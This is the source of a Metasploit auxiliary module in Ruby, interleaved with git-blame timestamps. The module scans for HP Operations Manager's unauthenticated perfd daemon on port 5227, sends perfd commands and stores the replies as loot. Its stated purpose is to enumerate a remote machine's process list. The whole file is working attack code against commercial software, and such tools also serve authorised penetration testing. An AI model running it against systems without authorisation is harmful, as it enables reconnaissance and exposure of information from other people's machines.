2014-10-10 16:09:36 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2014-10-10 16:09:36 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Auxiliary
|
2014-10-10 16:09:36 +00:00
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
|
2014-10-11 20:07:52 +00:00
|
|
|
# TODO: figure out what these do:
|
|
|
|
# o: valid command, takes no args, does nothing
|
|
|
|
# B, c, F, G, I, M, U, x: all require an "instance id" and possibly other args
|
|
|
|
ALLOWED_COMMANDS = %w(a A i g l p t T u w Z)
|
2014-10-11 18:38:00 +00:00
|
|
|
|
2014-10-10 16:09:36 +00:00
|
|
|
def initialize
|
|
|
|
super(
|
2014-10-11 12:03:18 +00:00
|
|
|
'Name' => 'HP Operations Manager Perfd Environment Scanner',
|
2014-10-10 16:09:36 +00:00
|
|
|
'Description' => %q{
|
2014-10-14 16:57:43 +00:00
|
|
|
This module will enumerate the process list of a remote machine by abusing
|
|
|
|
HP Operation Manager's unauthenticated 'perfd' daemon.
|
2014-10-10 16:09:36 +00:00
|
|
|
},
|
|
|
|
'Author' => [ 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' ],
|
|
|
|
'License' => MSF_LICENSE
|
|
|
|
)
|
|
|
|
|
2014-10-13 01:34:13 +00:00
|
|
|
commands_help = ALLOWED_COMMANDS.join(',')
|
2014-10-10 16:09:36 +00:00
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(5227),
|
2014-10-11 18:38:00 +00:00
|
|
|
OptString.new("COMMANDS", [true, "Command(s) to execute (one or more of #{commands_help})", commands_help])
|
2017-05-03 20:42:21 +00:00
|
|
|
])
|
2014-10-10 16:09:36 +00:00
|
|
|
end
|
|
|
|
|
2014-10-11 18:38:00 +00:00
|
|
|
def commands
|
|
|
|
datastore['COMMANDS'].split(/[, ]+/).map(&:strip)
|
|
|
|
end
|
|
|
|
|
|
|
|
def setup
|
|
|
|
super
|
|
|
|
if datastore['COMMANDS']
|
|
|
|
bad_commands = commands - ALLOWED_COMMANDS
|
|
|
|
unless bad_commands.empty?
|
2014-10-13 01:34:13 +00:00
|
|
|
fail ArgumentError, "Bad perfd command(s): #{bad_commands}"
|
2014-10-11 18:38:00 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2014-10-10 16:09:36 +00:00
|
|
|
def run_host(target_host)
|
|
|
|
begin
|
2014-10-11 17:39:12 +00:00
|
|
|
|
|
|
|
connect
|
2014-10-11 18:12:49 +00:00
|
|
|
banner_resp = sock.get_once
|
|
|
|
if banner_resp && banner_resp =~ /^Welcome to the perfd server/
|
|
|
|
banner_resp.strip!
|
|
|
|
print_good("#{target_host}:#{rport}, Perfd server banner: #{banner_resp}")
|
|
|
|
perfd_service = report_service(host: rhost, port: rport, name: "perfd", proto: "tcp", info: banner_resp)
|
2014-10-11 18:38:00 +00:00
|
|
|
sock.puts("\n")
|
|
|
|
|
|
|
|
commands.each do |command|
|
|
|
|
sock.puts("#{command}\n")
|
|
|
|
Rex.sleep(1)
|
|
|
|
command_resp = sock.get_once
|
2014-10-11 17:39:12 +00:00
|
|
|
|
2014-10-11 18:38:00 +00:00
|
|
|
loot_name = "HP Ops Agent perfd #{command}"
|
|
|
|
path = store_loot(
|
|
|
|
"hp.ops.agent.perfd.#{command}",
|
|
|
|
'text/plain',
|
|
|
|
target_host,
|
|
|
|
command_resp,
|
|
|
|
nil,
|
|
|
|
"HP Ops Agent perfd #{command}",
|
|
|
|
perfd_service
|
|
|
|
)
|
|
|
|
print_status("#{target_host}:#{rport} - #{loot_name} saved in: #{path}")
|
|
|
|
end
|
2014-10-11 17:39:12 +00:00
|
|
|
else
|
|
|
|
print_error("#{target_host}:#{rport}, Perfd server banner detection failed!")
|
|
|
|
end
|
|
|
|
disconnect
|
2014-10-11 18:12:49 +00:00
|
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
2014-10-10 16:09:36 +00:00
|
|
|
rescue Timeout::Error => e
|
|
|
|
print_error(e.message)
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|